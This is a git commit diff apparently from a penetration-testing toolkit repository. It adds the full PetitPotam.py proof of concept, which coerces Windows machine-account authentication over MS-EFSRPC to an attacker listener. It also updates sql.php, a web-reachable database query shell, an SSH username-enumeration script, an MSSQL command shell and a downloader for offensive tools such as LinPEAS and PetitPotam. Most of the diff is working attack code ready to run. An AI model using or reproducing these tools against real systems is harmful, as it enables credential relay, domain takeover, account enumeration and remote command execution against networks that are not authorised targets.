update + fix
This commit is contained in:
parent
577fa39263
commit
afb27bd33d
461
PetitPotam.py
Executable file
461
PetitPotam.py
Executable file
@ -0,0 +1,461 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
#
|
||||||
|
# Author: GILLES Lionel aka topotam (@topotam77)
|
||||||
|
#
|
||||||
|
# Greetz : grenadine(@Greynardine), skar(@__skar), didakt(@inf0sec1), plissken, pixis(@HackAndDo) my friends!
|
||||||
|
# "Most of" the code stolen from dementor.py from @3xocyte ;)
|
||||||
|
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import argparse
|
||||||
|
|
||||||
|
from impacket import system_errors
|
||||||
|
from impacket.dcerpc.v5 import transport
|
||||||
|
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
|
||||||
|
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR
|
||||||
|
from impacket.dcerpc.v5.rpcrt import DCERPCException, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
|
||||||
|
from impacket.uuid import uuidtup_to_bin
|
||||||
|
|
||||||
|
|
||||||
|
show_banner = '''
|
||||||
|
|
||||||
|
___ _ _ _ ___ _
|
||||||
|
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
|
||||||
|
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
|
||||||
|
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
|
||||||
|
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
|
||||||
|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
|
||||||
|
|
||||||
|
PoC to elicit machine account authentication via some MS-EFSRPC functions
|
||||||
|
by topotam (@topotam77)
|
||||||
|
|
||||||
|
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
|
||||||
|
|
||||||
|
|
||||||
|
'''
|
||||||
|
|
||||||
|
class DCERPCSessionError(DCERPCException):
|
||||||
|
def __init__(self, error_string=None, error_code=None, packet=None):
|
||||||
|
DCERPCException.__init__(self, error_string, error_code, packet)
|
||||||
|
|
||||||
|
def __str__( self ):
|
||||||
|
key = self.error_code
|
||||||
|
if key in system_errors.ERROR_MESSAGES:
|
||||||
|
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
|
||||||
|
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
|
||||||
|
return 'EFSR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
|
||||||
|
else:
|
||||||
|
return 'EFSR SessionError: unknown error code: 0x%x' % self.error_code
|
||||||
|
|
||||||
|
|
||||||
|
################################################################################
|
||||||
|
# STRUCTURES
|
||||||
|
################################################################################
|
||||||
|
class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
|
||||||
|
align = 1
|
||||||
|
structure = (
|
||||||
|
('Data', '20s'),
|
||||||
|
)
|
||||||
|
class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
|
||||||
|
align = 1
|
||||||
|
structure = (
|
||||||
|
('Data', '20s'),
|
||||||
|
)
|
||||||
|
class EFS_EXIM_PIPE(NDRSTRUCT):
|
||||||
|
align = 1
|
||||||
|
structure = (
|
||||||
|
('Data', ':'),
|
||||||
|
)
|
||||||
|
class EFS_HASH_BLOB(NDRSTRUCT):
|
||||||
|
|
||||||
|
structure = (
|
||||||
|
('Data', DWORD),
|
||||||
|
('cbData', PCHAR),
|
||||||
|
)
|
||||||
|
class EFS_RPC_BLOB(NDRSTRUCT):
|
||||||
|
|
||||||
|
structure = (
|
||||||
|
('Data', DWORD),
|
||||||
|
('cbData', PCHAR),
|
||||||
|
)
|
||||||
|
|
||||||
|
class EFS_CERTIFICATE_BLOB(NDRSTRUCT):
|
||||||
|
structure = (
|
||||||
|
('Type', DWORD),
|
||||||
|
('Data', DWORD),
|
||||||
|
('cbData', PCHAR),
|
||||||
|
)
|
||||||
|
class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
|
||||||
|
structure = (
|
||||||
|
('Lenght', DWORD),
|
||||||
|
('SID', RPC_SID),
|
||||||
|
('Hash', EFS_HASH_BLOB),
|
||||||
|
('Display', LPWSTR),
|
||||||
|
)
|
||||||
|
class ENCRYPTION_CERTIFICATE(NDRSTRUCT):
|
||||||
|
structure = (
|
||||||
|
('Lenght', DWORD),
|
||||||
|
('SID', RPC_SID),
|
||||||
|
('Hash', EFS_CERTIFICATE_BLOB),
|
||||||
|
|
||||||
|
)
|
||||||
|
class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):
|
||||||
|
align = 1
|
||||||
|
structure = (
|
||||||
|
('Cert', DWORD),
|
||||||
|
('Users', ENCRYPTION_CERTIFICATE_HASH),
|
||||||
|
)
|
||||||
|
class ENCRYPTED_FILE_METADATA_SIGNATURE(NDRSTRUCT):
|
||||||
|
structure = (
|
||||||
|
('Type', DWORD),
|
||||||
|
('HASH', ENCRYPTION_CERTIFICATE_HASH_LIST),
|
||||||
|
('Certif', ENCRYPTION_CERTIFICATE),
|
||||||
|
('Blob', EFS_RPC_BLOB),
|
||||||
|
)
|
||||||
|
class EFS_RPC_BLOB(NDRSTRUCT):
|
||||||
|
structure = (
|
||||||
|
('Data', DWORD),
|
||||||
|
('cbData', PCHAR),
|
||||||
|
)
|
||||||
|
class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
|
||||||
|
align = 1
|
||||||
|
structure = (
|
||||||
|
('Data', ':'),
|
||||||
|
)
|
||||||
|
|
||||||
|
################################################################################
|
||||||
|
# RPC CALLS
|
||||||
|
################################################################################
|
||||||
|
class EfsRpcOpenFileRaw(NDRCALL):
|
||||||
|
opnum = 0
|
||||||
|
structure = (
|
||||||
|
('fileName', WSTR),
|
||||||
|
('Flag', ULONG),
|
||||||
|
)
|
||||||
|
|
||||||
|
class EfsRpcOpenFileRawResponse(NDRCALL):
|
||||||
|
structure = (
|
||||||
|
('hContext', EXIMPORT_CONTEXT_HANDLE),
|
||||||
|
('ErrorCode', ULONG),
|
||||||
|
)
|
||||||
|
class EfsRpcEncryptFileSrv(NDRCALL):
|
||||||
|
opnum = 4
|
||||||
|
structure = (
|
||||||
|
('FileName', WSTR),
|
||||||
|
)
|
||||||
|
|
||||||
|
class EfsRpcEncryptFileSrvResponse(NDRCALL):
|
||||||
|
structure = (
|
||||||
|
('ErrorCode', ULONG),
|
||||||
|
)
|
||||||
|
class EfsRpcDecryptFileSrv(NDRCALL):
|
||||||
|
opnum = 5
|
||||||
|
structure = (
|
||||||
|
('FileName', WSTR),
|
||||||
|
('Flag', ULONG),
|
||||||
|
)
|
||||||
|
|
||||||
|
class EfsRpcDecryptFileSrvResponse(NDRCALL):
|
||||||
|
structure = (
|
||||||
|
('ErrorCode', ULONG),
|
||||||
|
)
|
||||||
|
class EfsRpcQueryUsersOnFile(NDRCALL):
|
||||||
|
opnum = 6
|
||||||
|
structure = (
|
||||||
|
('FileName', WSTR),
|
||||||
|
|
||||||
|
)
|
||||||
|
class EfsRpcQueryUsersOnFileResponse(NDRCALL):
|
||||||
|
structure = (
|
||||||
|
('ErrorCode', ULONG),
|
||||||
|
)
|
||||||
|
class EfsRpcQueryRecoveryAgents(NDRCALL):
|
||||||
|
opnum = 7
|
||||||
|
structure = (
|
||||||
|
('FileName', WSTR),
|
||||||
|
|
||||||
|
)
|
||||||
|
class EfsRpcQueryRecoveryAgentsResponse(NDRCALL):
|
||||||
|
structure = (
|
||||||
|
('ErrorCode', ULONG),
|
||||||
|
)
|
||||||
|
class EfsRpcRemoveUsersFromFile(NDRCALL):
|
||||||
|
opnum = 8
|
||||||
|
structure = (
|
||||||
|
('FileName', WSTR),
|
||||||
|
('Users', ENCRYPTION_CERTIFICATE_HASH_LIST)
|
||||||
|
|
||||||
|
)
|
||||||
|
class EfsRpcRemoveUsersFromFileResponse(NDRCALL):
|
||||||
|
structure = (
|
||||||
|
('ErrorCode', ULONG),
|
||||||
|
)
|
||||||
|
class EfsRpcAddUsersToFile(NDRCALL):
|
||||||
|
opnum = 9
|
||||||
|
structure = (
|
||||||
|
('FileName', WSTR),
|
||||||
|
('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST)
|
||||||
|
|
||||||
|
)
|
||||||
|
class EfsRpcAddUsersToFileResponse(NDRCALL):
|
||||||
|
structure = (
|
||||||
|
('ErrorCode', ULONG),
|
||||||
|
)
|
||||||
|
class EfsRpcFileKeyInfo(NDRCALL):
|
||||||
|
opnum = 12
|
||||||
|
structure = (
|
||||||
|
('FileName', WSTR),
|
||||||
|
('infoClass', DWORD),
|
||||||
|
)
|
||||||
|
class EfsRpcFileKeyInfoResponse(NDRCALL):
|
||||||
|
structure = (
|
||||||
|
('ErrorCode', ULONG),
|
||||||
|
)
|
||||||
|
class EfsRpcDuplicateEncryptionInfoFile(NDRCALL):
|
||||||
|
opnum = 13
|
||||||
|
structure = (
|
||||||
|
('SrcFileName', WSTR),
|
||||||
|
('DestFileName', WSTR),
|
||||||
|
('dwCreationDisposition', DWORD),
|
||||||
|
('dwAttributes', DWORD),
|
||||||
|
('RelativeSD', EFS_RPC_BLOB),
|
||||||
|
('bInheritHandle', BOOL),
|
||||||
|
)
|
||||||
|
|
||||||
|
class EfsRpcDuplicateEncryptionInfoFileResponse(NDRCALL):
|
||||||
|
structure = (
|
||||||
|
('ErrorCode', ULONG),
|
||||||
|
)
|
||||||
|
class EfsRpcAddUsersToFileEx(NDRCALL):
|
||||||
|
opnum = 15
|
||||||
|
structure = (
|
||||||
|
('dwFlags', DWORD),
|
||||||
|
('Reserved', EFS_RPC_BLOB),
|
||||||
|
('FileName', WSTR),
|
||||||
|
('dwAttributes', DWORD),
|
||||||
|
('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST),
|
||||||
|
)
|
||||||
|
|
||||||
|
class EfsRpcAddUsersToFileExResponse(NDRCALL):
|
||||||
|
structure = (
|
||||||
|
('ErrorCode', ULONG),
|
||||||
|
)
|
||||||
|
class EfsRpcFileKeyInfoEx(NDRCALL):
|
||||||
|
opnum = 16
|
||||||
|
structure = (
|
||||||
|
('dwFileKeyInfoFlags', DWORD),
|
||||||
|
('Reserved', EFS_RPC_BLOB),
|
||||||
|
('FileName', WSTR),
|
||||||
|
('InfoClass', DWORD),
|
||||||
|
)
|
||||||
|
class EfsRpcFileKeyInfoExResponse(NDRCALL):
|
||||||
|
structure = (
|
||||||
|
('ErrorCode', ULONG),
|
||||||
|
)
|
||||||
|
class EfsRpcGetEncryptedFileMetadata(NDRCALL):
|
||||||
|
opnum = 18
|
||||||
|
structure = (
|
||||||
|
('FileName', WSTR),
|
||||||
|
)
|
||||||
|
class EfsRpcGetEncryptedFileMetadataResponse(NDRCALL):
|
||||||
|
structure = (
|
||||||
|
('ErrorCode', ULONG),
|
||||||
|
)
|
||||||
|
class EfsRpcSetEncryptedFileMetadata(NDRCALL):
|
||||||
|
opnum = 19
|
||||||
|
structure = (
|
||||||
|
('FileName', WSTR),
|
||||||
|
('OldEfsStreamBlob', EFS_RPC_BLOB),
|
||||||
|
('NewEfsStreamBlob', EFS_RPC_BLOB),
|
||||||
|
('NewEfsSignature', ENCRYPTED_FILE_METADATA_SIGNATURE),
|
||||||
|
)
|
||||||
|
class EfsRpcSetEncryptedFileMetadataResponse(NDRCALL):
|
||||||
|
structure = (
|
||||||
|
('ErrorCode', ULONG),
|
||||||
|
)
|
||||||
|
class EfsRpcEncryptFileExSrv(NDRCALL):
|
||||||
|
opnum = 21
|
||||||
|
structure = (
|
||||||
|
('FileName', WSTR),
|
||||||
|
('ProtectorDescriptor', WSTR),
|
||||||
|
('Flags', ULONG),
|
||||||
|
)
|
||||||
|
class EfsRpcEncryptFileExSrvResponse(NDRCALL):
|
||||||
|
structure = (
|
||||||
|
('ErrorCode', ULONG),
|
||||||
|
)
|
||||||
|
#class EfsRpcQueryProtectors(NDRCALL):
|
||||||
|
# opnum = 21
|
||||||
|
# structure = (
|
||||||
|
# ('FileName', WSTR),
|
||||||
|
# ('ppProtectorList', PENCRYPTION_PROTECTOR_LIST),
|
||||||
|
# )
|
||||||
|
#class EfsRpcQueryProtectorsResponse(NDRCALL):
|
||||||
|
# structure = (
|
||||||
|
# ('ErrorCode', ULONG),
|
||||||
|
# )
|
||||||
|
|
||||||
|
################################################################################
|
||||||
|
# OPNUMs and their corresponding structures
|
||||||
|
################################################################################
|
||||||
|
OPNUMS = {
|
||||||
|
0 : (EfsRpcOpenFileRaw, EfsRpcOpenFileRawResponse),
|
||||||
|
4 : (EfsRpcEncryptFileSrv, EfsRpcEncryptFileSrvResponse),
|
||||||
|
5 : (EfsRpcDecryptFileSrv, EfsRpcDecryptFileSrvResponse),
|
||||||
|
6 : (EfsRpcQueryUsersOnFile, EfsRpcQueryUsersOnFileResponse),
|
||||||
|
7 : (EfsRpcQueryRecoveryAgents, EfsRpcQueryRecoveryAgentsResponse),
|
||||||
|
8 : (EfsRpcRemoveUsersFromFile, EfsRpcRemoveUsersFromFileResponse),
|
||||||
|
9 : (EfsRpcAddUsersToFile, EfsRpcAddUsersToFileResponse),
|
||||||
|
12 : (EfsRpcFileKeyInfo, EfsRpcFileKeyInfoResponse),
|
||||||
|
13 : (EfsRpcDuplicateEncryptionInfoFile, EfsRpcDuplicateEncryptionInfoFileResponse),
|
||||||
|
15 : (EfsRpcAddUsersToFileEx, EfsRpcAddUsersToFileExResponse),
|
||||||
|
16 : (EfsRpcFileKeyInfoEx, EfsRpcFileKeyInfoExResponse),
|
||||||
|
18 : (EfsRpcGetEncryptedFileMetadata, EfsRpcGetEncryptedFileMetadataResponse),
|
||||||
|
19 : (EfsRpcSetEncryptedFileMetadata, EfsRpcSetEncryptedFileMetadataResponse),
|
||||||
|
21 : (EfsRpcEncryptFileExSrv, EfsRpcEncryptFileExSrvResponse),
|
||||||
|
# 22 : (EfsRpcQueryProtectors, EfsRpcQueryProtectorsResponse),
|
||||||
|
}
|
||||||
|
|
||||||
|
class CoerceAuth():
|
||||||
|
def connect(self, username, password, domain, lmhash, nthash, target, pipe, doKerberos, dcHost, targetIp):
|
||||||
|
binding_params = {
|
||||||
|
'lsarpc': {
|
||||||
|
'stringBinding': r'ncacn_np:%s[\PIPE\lsarpc]' % target,
|
||||||
|
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
|
||||||
|
},
|
||||||
|
'efsr': {
|
||||||
|
'stringBinding': r'ncacn_np:%s[\PIPE\efsrpc]' % target,
|
||||||
|
'MSRPC_UUID_EFSR': ('df1941c5-fe89-4e79-bf10-463657acf44d', '1.0')
|
||||||
|
},
|
||||||
|
'samr': {
|
||||||
|
'stringBinding': r'ncacn_np:%s[\PIPE\samr]' % target,
|
||||||
|
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
|
||||||
|
},
|
||||||
|
'lsass': {
|
||||||
|
'stringBinding': r'ncacn_np:%s[\PIPE\lsass]' % target,
|
||||||
|
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
|
||||||
|
},
|
||||||
|
'netlogon': {
|
||||||
|
'stringBinding': r'ncacn_np:%s[\PIPE\netlogon]' % target,
|
||||||
|
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
|
||||||
|
},
|
||||||
|
}
|
||||||
|
rpctransport = transport.DCERPCTransportFactory(binding_params[pipe]['stringBinding'])
|
||||||
|
if hasattr(rpctransport, 'set_credentials'):
|
||||||
|
rpctransport.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash)
|
||||||
|
|
||||||
|
if doKerberos:
|
||||||
|
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
|
||||||
|
if targetIp:
|
||||||
|
rpctransport.setRemoteHost(targetIp)
|
||||||
|
|
||||||
|
dce = rpctransport.get_dce_rpc()
|
||||||
|
dce.set_auth_type(RPC_C_AUTHN_WINNT)
|
||||||
|
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
|
||||||
|
print("[-] Connecting to %s" % binding_params[pipe]['stringBinding'])
|
||||||
|
try:
|
||||||
|
dce.connect()
|
||||||
|
except Exception as e:
|
||||||
|
print("Something went wrong, check error status => %s" % str(e))
|
||||||
|
#sys.exit()
|
||||||
|
return
|
||||||
|
print("[+] Connected!")
|
||||||
|
print("[+] Binding to %s" % binding_params[pipe]['MSRPC_UUID_EFSR'][0])
|
||||||
|
try:
|
||||||
|
dce.bind(uuidtup_to_bin(binding_params[pipe]['MSRPC_UUID_EFSR']))
|
||||||
|
except Exception as e:
|
||||||
|
print("Something went wrong, check error status => %s" % str(e))
|
||||||
|
#sys.exit()
|
||||||
|
return
|
||||||
|
print("[+] Successfully bound!")
|
||||||
|
return dce
|
||||||
|
|
||||||
|
def EfsRpcOpenFileRaw(self, dce, listener):
|
||||||
|
print("[-] Sending EfsRpcOpenFileRaw!")
|
||||||
|
try:
|
||||||
|
request = EfsRpcOpenFileRaw()
|
||||||
|
request['fileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
|
||||||
|
request['Flag'] = 0
|
||||||
|
#request.dump()
|
||||||
|
resp = dce.request(request)
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
if str(e).find('ERROR_BAD_NETPATH') >= 0:
|
||||||
|
print('[+] Got expected ERROR_BAD_NETPATH exception!!')
|
||||||
|
print('[+] Attack worked!')
|
||||||
|
#sys.exit()
|
||||||
|
return None
|
||||||
|
if str(e).find('rpc_s_access_denied') >= 0:
|
||||||
|
print('[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!')
|
||||||
|
print('[+] OK! Using unpatched function!')
|
||||||
|
print("[-] Sending EfsRpcEncryptFileSrv!")
|
||||||
|
try:
|
||||||
|
request = EfsRpcEncryptFileSrv()
|
||||||
|
request['FileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
|
||||||
|
resp = dce.request(request)
|
||||||
|
except Exception as e:
|
||||||
|
if str(e).find('ERROR_BAD_NETPATH') >= 0:
|
||||||
|
print('[+] Got expected ERROR_BAD_NETPATH exception!!')
|
||||||
|
print('[+] Attack worked!')
|
||||||
|
pass
|
||||||
|
else:
|
||||||
|
print("Something went wrong, check error status => %s" % str(e))
|
||||||
|
return None
|
||||||
|
#sys.exit()
|
||||||
|
|
||||||
|
else:
|
||||||
|
print("Something went wrong, check error status => %s" % str(e))
|
||||||
|
return None
|
||||||
|
#sys.exit()
|
||||||
|
|
||||||
|
def main():
|
||||||
|
parser = argparse.ArgumentParser(add_help = True, description = "PetitPotam - rough PoC to connect to lsarpc and elicit machine account authentication via MS-EFSRPC EfsRpcOpenFileRaw()")
|
||||||
|
parser.add_argument('-u', '--username', action="store", default='', help='valid username')
|
||||||
|
parser.add_argument('-p', '--password', action="store", default='', help='valid password (if omitted, it will be asked unless -no-pass)')
|
||||||
|
parser.add_argument('-d', '--domain', action="store", default='', help='valid domain name')
|
||||||
|
parser.add_argument('-hashes', action="store", metavar="[LMHASH]:NTHASH", help='NT/LM hashes (LM hash can be empty)')
|
||||||
|
|
||||||
|
parser.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
|
||||||
|
parser.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
|
||||||
|
'(KRB5CCNAME) based on target parameters. If valid credentials '
|
||||||
|
'cannot be found, it will use the ones specified in the command '
|
||||||
|
'line')
|
||||||
|
parser.add_argument('-dc-ip', action="store", metavar="ip address", help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter')
|
||||||
|
parser.add_argument('-target-ip', action='store', metavar="ip address",
|
||||||
|
help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
|
||||||
|
'This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it')
|
||||||
|
|
||||||
|
parser.add_argument('-pipe', action="store", choices=['efsr', 'lsarpc', 'samr', 'netlogon', 'lsass', 'all'], default='lsarpc', help='Named pipe to use (default: lsarpc) or all')
|
||||||
|
parser.add_argument('listener', help='ip address or hostname of listener')
|
||||||
|
parser.add_argument('target', help='ip address or hostname of target')
|
||||||
|
options = parser.parse_args()
|
||||||
|
|
||||||
|
if options.hashes is not None:
|
||||||
|
lmhash, nthash = options.hashes.split(':')
|
||||||
|
else:
|
||||||
|
lmhash = ''
|
||||||
|
nthash = ''
|
||||||
|
|
||||||
|
print(show_banner)
|
||||||
|
|
||||||
|
if options.password == '' and options.username != '' and options.hashes is None and options.no_pass is not True:
|
||||||
|
from getpass import getpass
|
||||||
|
options.password = getpass("Password:")
|
||||||
|
|
||||||
|
plop = CoerceAuth()
|
||||||
|
|
||||||
|
if options.pipe == "all":
|
||||||
|
all_pipes = ['efsr', 'lsarpc', 'samr', 'netlogon', 'lsass']
|
||||||
|
else:
|
||||||
|
all_pipes = [options.pipe]
|
||||||
|
|
||||||
|
for all_pipe in all_pipes:
|
||||||
|
print("Trying pipe", all_pipe)
|
||||||
|
dce = plop.connect(username=options.username, password=options.password, domain=options.domain, lmhash=lmhash, nthash=nthash, target=options.target, pipe=all_pipe, doKerberos=options.k, dcHost=options.dc_ip, targetIp=options.target_ip)
|
||||||
|
if dce is not None:
|
||||||
|
plop.EfsRpcOpenFileRaw(dce, options.listener)
|
||||||
|
dce.disconnect()
|
||||||
|
sys.exit()
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
main()
|
BIN
cdk64
Normal file
BIN
cdk64
Normal file
Binary file not shown.
@ -247,11 +247,14 @@ class HttpFileServer(HTTPServer):
|
|||||||
|
|
||||||
def get_base_url(self, ip_addr=None):
|
def get_base_url(self, ip_addr=None):
|
||||||
addr, port = self.server_address
|
addr, port = self.server_address
|
||||||
if port != 80:
|
|
||||||
port = f":{port}"
|
|
||||||
if ip_addr is not None:
|
if ip_addr is not None:
|
||||||
addr = ip_addr
|
addr = ip_addr
|
||||||
|
|
||||||
protocol = "https" if type(self.socket) == ssl.SSLSocket else "http"
|
protocol = "https" if type(self.socket) == ssl.SSLSocket else "http"
|
||||||
|
if (int(port) == 80 and protocol == "http") or (int(port) == 443 and protocol == "https"):
|
||||||
|
port = ""
|
||||||
|
|
||||||
return f"{protocol}://{addr}{port}"
|
return f"{protocol}://{addr}{port}"
|
||||||
|
|
||||||
def get_full_url(self, uri, ip_addr=None):
|
def get_full_url(self, uri, ip_addr=None):
|
||||||
|
356
linpeas.sh
356
linpeas.sh
File diff suppressed because one or more lines are too long
20
sql.php
20
sql.php
@ -1,10 +1,20 @@
|
|||||||
<?php
|
<?php
|
||||||
|
|
||||||
error_reporting(E_ALL);
|
error_reporting(E_ALL);
|
||||||
$username = $_REQUEST["username"];
|
|
||||||
$password = $_REQUEST["password"];
|
if (php_sapi_name() === "cli") {
|
||||||
$database = (isset($_REQUEST["database"]) ? $_REQUEST["database"] : null);
|
$username = $argv[1];
|
||||||
$host = (isset($_REQUEST["host"]) ? $_REQUEST["host"] : "localhost");
|
$password = $argv[2];
|
||||||
$query = (isset($_REQUEST["query"]) ? $_REQUEST["query"] : "SELECT @@version");
|
$database = $argv[3] ?? null;
|
||||||
|
$host = $argv[4] ?? "localhost";
|
||||||
|
$query = $argv[5] ?? "SELECT @@version";
|
||||||
|
} else {
|
||||||
|
$username = $_REQUEST["username"];
|
||||||
|
$password = $_REQUEST["password"];
|
||||||
|
$database = (isset($_REQUEST["database"]) ? $_REQUEST["database"] : null);
|
||||||
|
$host = (isset($_REQUEST["host"]) ? $_REQUEST["host"] : "localhost");
|
||||||
|
$query = (isset($_REQUEST["query"]) ? $_REQUEST["query"] : "SELECT @@version");
|
||||||
|
}
|
||||||
|
|
||||||
$link = mysqli_connect($host, $username, $password, $database);
|
$link = mysqli_connect($host, $username, $password, $database);
|
||||||
if (!$link) {
|
if (!$link) {
|
||||||
|
@ -10,15 +10,6 @@ import socket
|
|||||||
import sys
|
import sys
|
||||||
import pdb
|
import pdb
|
||||||
|
|
||||||
arg_parser = argparse.ArgumentParser()
|
|
||||||
arg_parser.add_argument('-t',dest='hostname', type=str, help='Single target')
|
|
||||||
arg_parser.add_argument('-p',dest='port', type=int, default=22, help='port to connect on: Default port is 22')
|
|
||||||
arg_parser.add_argument('-u',dest='username', type=str, help='username you want to enumerate')
|
|
||||||
arg_parser.add_argument('-w',dest='wordlist', help='enumerate multiple users')
|
|
||||||
args = arg_parser.parse_args()
|
|
||||||
port = args.port
|
|
||||||
target = args.hostname
|
|
||||||
|
|
||||||
class InvalidUsername(Exception):
|
class InvalidUsername(Exception):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
@ -59,23 +50,34 @@ def _paramiko_tunnel(username, *args, **kwargs):
|
|||||||
print ('[+] {} - Valid username'.format(us))
|
print ('[+] {} - Valid username'.format(us))
|
||||||
return
|
return
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
|
||||||
paramiko.auth_handler.AuthHandler._client_handler_table.update({
|
arg_parser = argparse.ArgumentParser()
|
||||||
paramiko.common.MSG_SERVICE_ACCEPT: service_accept,
|
arg_parser.add_argument('-H',dest='hostname', type=str, help='Single target')
|
||||||
paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure
|
arg_parser.add_argument('-t',dest='threads', type=int, help='Number of threads', default=10)
|
||||||
})
|
arg_parser.add_argument('-p',dest='port', type=int, default=22, help='port to connect on: Default port is 22')
|
||||||
|
arg_parser.add_argument('-u',dest='username', type=str, help='username you want to enumerate')
|
||||||
|
arg_parser.add_argument('-w',dest='wordlist', help='enumerate multiple users')
|
||||||
|
args = arg_parser.parse_args()
|
||||||
|
port = args.port
|
||||||
|
target = args.hostname
|
||||||
|
|
||||||
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
|
paramiko.auth_handler.AuthHandler._client_handler_table.update({
|
||||||
|
paramiko.common.MSG_SERVICE_ACCEPT: service_accept,
|
||||||
|
paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure
|
||||||
|
})
|
||||||
|
|
||||||
if args.username is not None:
|
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
|
||||||
username = args.username
|
|
||||||
_paramiko_tunnel(target, port, username)
|
|
||||||
|
|
||||||
if args.wordlist is not None:
|
if args.username is not None:
|
||||||
usernames = []
|
username = args.username
|
||||||
mp = []
|
_paramiko_tunnel(target, port, username)
|
||||||
pool = multiprocessing.Pool(5)
|
|
||||||
with open(args.wordlist) as f:
|
if args.wordlist is not None:
|
||||||
for u in f:
|
usernames = []
|
||||||
usernames.append(u)
|
mp = []
|
||||||
pool.map(_paramiko_tunnel, usernames)
|
pool = multiprocessing.Pool(args.threads)
|
||||||
|
with open(args.wordlist) as f:
|
||||||
|
for u in f:
|
||||||
|
usernames.append(u)
|
||||||
|
pool.map(_paramiko_tunnel, usernames)
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
|
|
||||||
# Usage: download_zip <url> <destination file>
|
# Usage: download <url> <destination file>
|
||||||
download () {
|
download () {
|
||||||
tmpfile=$(mktemp /tmp/wget.XXXXXX)
|
tmpfile=$(mktemp /tmp/wget.XXXXXX)
|
||||||
wget --no-verbose "$1" -O "$tmpfile"
|
wget --no-verbose "$1" -O "$tmpfile"
|
||||||
@ -48,6 +48,7 @@ download https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration
|
|||||||
download https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh linux-exploit-suggester.sh
|
download https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh linux-exploit-suggester.sh
|
||||||
download https://github.com/rebootuser/LinEnum/raw/master/LinEnum.sh LinEnum.sh
|
download https://github.com/rebootuser/LinEnum/raw/master/LinEnum.sh LinEnum.sh
|
||||||
download https://github.com/stealthcopter/deepce/raw/main/deepce.sh deepce.sh
|
download https://github.com/stealthcopter/deepce/raw/main/deepce.sh deepce.sh
|
||||||
|
download https://raw.githubusercontent.com/topotam/PetitPotam/main/PetitPotam.py PetitPotam.py
|
||||||
|
|
||||||
echo "Updating LinPEAS + WinPEAS…"
|
echo "Updating LinPEAS + WinPEAS…"
|
||||||
peas_version=$(get_latest_version carlospolop/PEASS-ng)
|
peas_version=$(get_latest_version carlospolop/PEASS-ng)
|
||||||
|
BIN
win/winPEAS.exe
BIN
win/winPEAS.exe
Binary file not shown.
Binary file not shown.
@ -44,7 +44,6 @@ class XpShell(cmd.Cmd):
|
|||||||
print('Exception: ')
|
print('Exception: ')
|
||||||
print(str(e))
|
print(str(e))
|
||||||
raise e
|
raise e
|
||||||
pass
|
|
||||||
|
|
||||||
# i wont say what it does
|
# i wont say what it does
|
||||||
def do_exit(self, arg):
|
def do_exit(self, arg):
|
||||||
@ -151,8 +150,9 @@ def connect_mssql(ip, port=1433, username="sa", password="", domain=""):
|
|||||||
# do database connection (simple for now)
|
# do database connection (simple for now)
|
||||||
ms_sql = tds.MSSQL(ip, port)
|
ms_sql = tds.MSSQL(ip, port)
|
||||||
ms_sql.connect()
|
ms_sql.connect()
|
||||||
res = ms_sql.login(database = None, username=username, password=password, domain=domain)
|
res = ms_sql.login(database=None, username=username, password=password, domain=domain)
|
||||||
ms_sql.printReplies()
|
ms_sql.printReplies()
|
||||||
|
print(res)
|
||||||
if res:
|
if res:
|
||||||
